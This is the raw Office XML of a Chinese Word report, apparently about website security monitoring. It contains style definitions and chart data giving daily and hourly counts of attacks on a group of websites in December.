  <w15:docId w15:val="{66AA9D53-F412-4120-A6E0-3C0C2183C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kern w:val="2"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="22"/>
        <w:lang w:bidi="ar-SA" w:eastAsia="zh-CN"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qFormat="1"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pPr>
      <w:widowControl w:val="0"/>
      <w:jc w:val="both"/>
    </w:pPr>
  </w:style>
  <w:style w:styleId="1" w:type="paragraph">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00CF7283"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="330" w:before="340" w:line="578" w:lineRule="auto"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="2" w:type="paragraph">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="001E04E4"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="260" w:before="260" w:line="416" w:lineRule="auto"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>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Char"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="008317DA"/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:color="auto" w:space="1" w:sz="6" w:val="single"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:pos="4153" w:val="center"/>
        <w:tab w:pos="8306" w:val="right"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:customStyle="1" w:styleId="Char" w:type="character">
    <w:name w:val="页眉 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a3"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="008317DA"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="a4" w:type="paragraph">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char0"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="008317DA"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:pos="4153" w:val="center"/>
        <w:tab w:pos="8306" w:val="right"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:customStyle="1" w:styleId="Char0" w:type="character">
    <w:name w:val="页脚 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a4"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="008317DA"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:customStyle="1" w:styleId="2Char" w:type="character">
    <w:name w:val="标题 2 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="001E04E4"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:customStyle="1" w:styleId="1Char" w:type="character">
    <w:name w:val="标题 1 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00CF7283"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:customStyle="1" w:styleId="fontstyle11" w:type="character">
    <w:name w:val="fontstyle11"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
    <w:rsid w:val="005379B7"/>
    <w:rPr>
      <w:rFonts w:ascii="MicrosoftYaHei" w:hAnsi="MicrosoftYaHei" w:hint="default"/>
      <w:color w:val="333333"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:customStyle="1" w:styleId="fontstyle01" w:type="character">
    <w:name w:val="fontstyle01"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
    <w:rsid w:val="00DC0775"/>
    <w:rPr>
      <w:rFonts w:ascii="MicrosoftYaHei-Bold" w:hAnsi="MicrosoftYaHei-Bold" w:hint="default"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="333333"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="3" w:type="paragraph">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00647268"/>
    <w:pPr>
      <w:ind w:left="840" w:leftChars="400"/>
    </w:pPr>
  </w:style>
  <w:style w:styleId="10" w:type="paragraph">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00647268"/>
    <w:pPr>
      <w:spacing w:after="120" w:before="120"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="20" w:type="paragraph">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00647268"/>
    <w:pPr>
      <w:ind w:left="420" w:leftChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:styleId="a5" w:type="character">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00647268"/>
    <w:rPr>
      <w:color w:themeColor="hyperlink" w:val="0563C1"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:customStyle="1" w:styleId="TOC1" w:type="paragraph">
    <w:name w:val="TOC 标题1"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00647268"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:after="0" w:before="240" w:line="259" w:lineRule="auto"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:color w:themeColor="accent1" w:themeShade="BF" w:val="2E74B5"/>
      <w:kern w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="a6" w:type="paragraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="007E34ED"/>
    <w:pPr>
      <w:ind w:firstLine="420" w:firstLineChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:styleId="TOC" w:type="paragraph">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00807F53"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:after="0" w:before="240" w:line="259" w:lineRule="auto"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:color w:themeColor="accent1" w:themeShade="BF" w:val="2E74B5"/>
      <w:kern w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:customStyle="1" w:styleId="147147" w:type="paragraph">
    <w:name w:val="147147"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="147147Char"/>
    <w:rsid w:val="00C82032"/>
    <w:pPr>
      <w:spacing w:after="50" w:afterLines="50" w:before="50" w:beforeLines="50" w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="881" w:firstLineChars="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:customStyle="1" w:styleId="147147Char" w:type="character">
    <w:name w:val="147147 Char"/>
    <w:link w:val="147147"/>
    <w:rsid w:val="00C82032"/>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="4" w:type="paragraph">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="40"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="002032FB"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="290" w:before="280" w:line="376" w:lineRule="auto"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="5" w:type="paragraph">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="50"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="002032FB"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="290" w:before="280" w:line="376" w:lineRule="auto"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="6" w:type="paragraph">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="60"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="002032FB"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="64" w:before="240" w:line="320" w:lineRule="auto"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="7" w:type="paragraph">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="70"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00643DA1"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="64" w:before="240" w:line="320" w:lineRule="auto"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="8" w:type="paragraph">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="80"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00643DA1"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="64" w:before="240" w:line="320" w:lineRule="auto"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="9" w:type="paragraph">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="90"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00643DA1"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="64" w:before="240" w:line="320" w:lineRule="auto"/>
      <w:outlineLvl w:val="8"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAns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11" Target="media/image1.jpeg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId12" Target="charts/chart1641010223695.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart"/><Relationship Id="rId13" Target="charts/chart1641010223705.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart"/><Relationship Id="rId14" Target="charts/chart1641010223713.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart"/><Relationship Id="rId15" Target="charts/chart1641010223725.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart"/><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oter1.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer"/><Relationship Id="rId9" Target="fontTable.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable"/></Relationships>
</file>

<file path=word/charts/_rels/chart1641010223695.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="no"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Target="../embeddings/Microsoft_Office_Excel____1641010223691.xlsx" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package"/></Relationships>
</file>

<file path=word/charts/_rels/chart1641010223705.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="no"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Target="../embeddings/Microsoft_Office_Excel____1641010223701.xlsx" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package"/></Relationships>
</file>

<file path=word/charts/_rels/chart1641010223713.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="no"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Target="../embeddings/Microsoft_Office_Excel____1641010223710.xlsx" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package"/></Relationships>
</file>

<file path=word/charts/_rels/chart1641010223725.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="no"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Target="../embeddings/Microsoft_Office_Excel____1641010223722.xlsx" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package"/></Relationships>
</file>

<file path=word/charts/chart1641010223695.xml><?xml version="1.0" encoding="utf-8"?>
<c:chartSpace xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart"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p>
            <a:r>
              <a:t>网站群受攻击趋势</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:layout/>
      <c:overlay val="0"/>
      <c:spPr>
        <a:noFill/>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst/>
      </c:spPr>
      <c:txPr>
        <a:bodyPr anchor="ctr" anchorCtr="1" rot="0" spcFirstLastPara="1" vert="horz" vertOverflow="ellipsis" wrap="square"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:defRPr b="0" baseline="0" i="0" kern="1200" lang="zh-CN" spc="0" strike="noStrike" sz="1400" u="none">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spPr>
            <a:ln cap="rnd" w="28575">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:marker>
            <c:symbol val="circle"/>
            <c:size val="5"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
          </c:marker>
          <c:cat>
            <c:strRef>
              <c:f>Sheet1!$A$2:$A$32</c:f>
              <c:strCache>
                <c:ptCount val="31"/>
                <c:pt idx="0">
                  <c:v>12月01日</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>12月02日</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>12月03日</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>12月04日</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>12月05日</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>12月06日</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>12月07日</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>12月08日</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>12月09日</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>12月10日</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>12月11日</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>12月12日</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>12月13日</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>12月14日</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>12月15日</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>12月16日</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>12月17日</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>12月18日</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>12月19日</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>12月20日</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>12月21日</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>12月22日</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>12月23日</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>12月24日</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>12月25日</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>12月26日</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>12月27日</c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>12月28日</c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>12月29日</c:v>
                </c:pt>
                <c:pt idx="29">
                  <c:v>12月30日</c:v>
                </c:pt>
                <c:pt idx="30">
                  <c:v>12月31日</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$B$2:$B$32</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="31"/>
                <c:pt idx="0">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>41</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>281</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>30</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>80</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>53</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>38</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>4</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>19</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>39</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>43</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>59</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>45</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>53</c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>5</c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>46</c:v>
                </c:pt>
                <c:pt idx="29">
                  <c:v>17</c:v>
                </c:pt>
                <c:pt idx="30">
                  <c:v>91</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:marker val="1"/>
        <c:smooth val="0"/>
        <c:axId val="975809792"/>
        <c:axId val="975804896"/>
      </c:lineChart>
      <c:catAx>
        <c:axId val="975809792"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:spPr>
          <a:noFill/>
          <a:ln algn="ctr" cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="15000"/>
                <a:lumOff val="85000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:round/>
          </a:ln>
          <a:effectLst/>
        </c:spPr>
        <c:txPr>
          <a:bodyPr anchor="ctr" anchorCtr="1" rot="-4800000" spcFirstLastPara="1" vertOverflow="ellipsis" wrap="square"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr b="0" baseline="0" i="0" kern="1200" lang="zh-CN" strike="noStrike" sz="900" u="none">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr lang="zh-CN"/>
          </a:p>
        </c:txPr>
        <c:crossAx val="975804896"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="975804896"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="l"/>
        <c:majorGridlines>
          <c:spPr>
            <a:ln algn="ctr" cap="flat" cmpd="sng"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anchor="ctr" anchorCtr="1" rot="-60000000" spcFirstLastPara="1" vert="horz" vertOverflow="ellipsis" wrap="square"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr b="0" baseline="0" i="0" kern="1200" lang="zh-CN" strike="noStrike" sz="900" u="none">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr lang="zh-CN"/>
          </a:p>
        </c:txPr>
        <c:crossAx val="975809792"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="between"/>
      </c:valAx>
      <c:spPr>
        <a:noFill/>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst/>
      </c:spPr>
    </c:plotArea>
    <c:plotVisOnly val="1"/>
    <c:dispBlanksAs val="gap"/>
    <c:showDLblsOverMax val="0"/>
  </c:chart>
  <c:spPr>
    <a:solidFill>
      <a:schemeClr val="bg1"/>
    </a:solidFill>
    <a:ln algn="ctr" cap="flat" cmpd="sng" w="9525">
      <a:solidFill>
        <a:schemeClr val="tx1">
          <a:lumMod val="15000"/>
          <a:lumOff val="85000"/>
        </a:schemeClr>
      </a:solidFill>
      <a:round/>
    </a:ln>
    <a:effectLst/>
  </c:spPr>
  <c:txPr>
    <a:bodyPr/>
    <a:lstStyle/>
    <a:p>
      <a:pPr>
        <a:defRPr lang="zh-CN"/>
      </a:pPr>
      <a:endParaRPr lang="zh-CN"/>
    </a:p>
  </c:txPr>
  <c:externalData r:id="rId1"/>
  <c:printSettings>
    <c:headerFooter/>
    <c:pageMargins b="0.75" footer="0.3" header="0.3" l="0.7" r="0.7" t="0.75"/>
    <c:pageSetup/>
  </c:printSettings>
</c:chartSpace>
</file>

<file path=word/charts/chart1641010223705.xml><?xml version="1.0" encoding="utf-8"?>
<c:chartSpace xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart"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p>
            <a:r>
              <a:t>各个时间段攻击量趋势图</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:layout/>
      <c:overlay val="0"/>
      <c:spPr>
        <a:noFill/>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst/>
      </c:spPr>
      <c:txPr>
        <a:bodyPr anchor="ctr" anchorCtr="1" rot="0" spcFirstLastPara="1" vert="horz" vertOverflow="ellipsis" wrap="square"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:defRPr b="0" baseline="0" i="0" kern="1200" lang="zh-CN" spc="0" strike="noStrike" sz="1400" u="none">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spPr>
            <a:ln cap="rnd" w="28575">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:marker>
            <c:symbol val="circle"/>
            <c:size val="5"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
          </c:marker>
          <c:cat>
            <c:strRef>
              <c:f>Sheet1!$A$2:$A$25</c:f>
              <c:strCache>
                <c:ptCount val="24"/>
                <c:pt idx="0">
                  <c:v>0时</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>1时</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>2时</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>3时</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>4时</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>5时</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>6时</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>7时</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>8时</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>9时</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>10时</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>11时</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>12时</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>13时</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>14时</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>15时</c:v>
                </c:pt>
